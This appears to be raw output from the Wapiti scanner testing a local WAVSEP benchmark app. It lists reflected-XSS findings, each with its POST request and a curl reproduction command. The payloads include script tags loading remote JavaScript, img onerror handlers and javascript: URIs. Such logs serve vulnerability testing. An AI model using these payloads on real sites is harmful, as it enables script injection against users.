curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case29-Vbs2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwyl1fx29nt%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0um6aea4zz.js%3E%3C%2Fscript%3E&userinput2=default
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw0um6aea4zz.js%3E%3C%2Fscript%3E&userinput2=default"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp

XSS vulnerability found via injection in the parameter userinput2
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp
Content-Type: application/x-www-form-urlencoded

userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2e4yvbh4nz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2e4yvbh4nz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm0we3ae3bz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm0we3ae3bz.js%3E%3C%2Fscript%3E&__VIEWSTATE=%2FwEPDwUENTM4MWRkhsjF%2B62gWnhYUcEyuRwTHxGDVzA%3D"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wa158noj32%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST-Experimental/Case01-Tag2HtmlPageScope-StripScriptTag.jsp" -d "userinput=%3Cimg%20src%3D.%20onerror%3Dalert%28%22wa158noj32%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7xd8ke201z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case01-Tag2HtmlPageScope.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7xd8ke201z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3g5544aemz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case02-Tag2TagScope.jsp" -d "userinput=%3C%2Ftextarea%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3g5544aemz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9qw9f3pv5z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case03-Tag2TagStructure.jsp" -d "userinput=%22%2F%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw9qw9f3pv5z.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwn3kszkq4j%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case05-Tag2Frameset.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwn3kszkq4j%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w3wcbcixtn%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case06-Event2TagScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w3wcbcixtn%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wvcr17j0rp%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case07-Event2DoubleQuotePropertyScope.jsp" -d "userinput=%22%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22wvcr17j0rp%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w6vvlxgjuw%22%29%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case08-Event2SingleQuotePropertyScope.jsp" -d "userinput=%27%2F%3E%3Cimg%20src%3D.%20onerror%3Dalert%28%22w6vvlxgjuw%22%29%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz71y7p8ccz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case09-SrcProperty2TagStructure.jsp" -d "userinput=%3E%3C%2Fscript%3E%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwz71y7p8ccz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwwv0yu1zre%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case17-Js2PropertyJsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwwv0yu1zre%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwvanp11dgn%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case18-Js2PropertyJsScopeSingleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwvanp11dgn%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwjse8jnuho%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case19-Js2PropertyJsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwjse8jnuho%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cwz1rije7ae%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case20-Vbs2PropertyVbsScopeDoubleQuoteDelimiter.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cwz1rije7ae%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=javascript%3AString.fromCharCode%280%2Cw57sdrq2en%2C1%29%3B
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case21-Vbs2PropertyVbsScope.jsp" -d "userinput=javascript%3AString.fromCharCode%280%2Cw57sdrq2en%2C1%29%3B"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwa3wf6at5n%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case22-Js2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwa3wf6at5n%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cw9fhgjyyr8%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case23-Js2ScriptTagSingleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cw9fhgjyyr8%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwj1rlzky6p%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case24-Js2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwj1rlzky6p%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwck0lm1fpx%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case25-Vbs2ScriptTagDoubleQuoteDelimiter.jsp" -d "userinput=String.fromCharCode%280%2Cwck0lm1fpx%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwkkft1tnfs%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case26-Vbs2ScriptTag.jsp" -d "userinput=String.fromCharCode%280%2Cwkkft1tnfs%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwl1hj41t49%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case27-Js2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwl1hj41t49%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwg2cydeib5%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case28-Js2ScriptTagMLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwg2cydeib5%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp
Content-Type: application/x-www-form-urlencoded

userinput=String.fromCharCode%280%2Cwruhozabwi%2C1%29
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case29-Vbs2ScriptTagOLCommentScope.jsp" -d "userinput=String.fromCharCode%280%2Cwruhozabwi%2C1%29"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp

XSS vulnerability found via injection in the parameter userinput
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp
Content-Type: application/x-www-form-urlencoded

userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvvd8pzx49z.js%3E%3C%2Fscript%3E&userinput2=default
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwvvd8pzx49z.js%3E%3C%2Fscript%3E&userinput2=default"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp

XSS vulnerability found via injection in the parameter userinput2
POST /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp
Content-Type: application/x-www-form-urlencoded

userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm34rqrl5zz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -e "http://127.0.0.1:8090/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case30-Tag2HtmlPageScopeMultipleVulnerabilities.jsp" -d "userinput=default&userinput2=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwm34rqrl5zz.js%3E%3C%2Fscript%3E"

Vulnerability found in /wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-POST/Case32-Tag2HtmlPageScopeValidViewstateRequired.jsp

XSS vulnerability found via injection in the parameter userinput
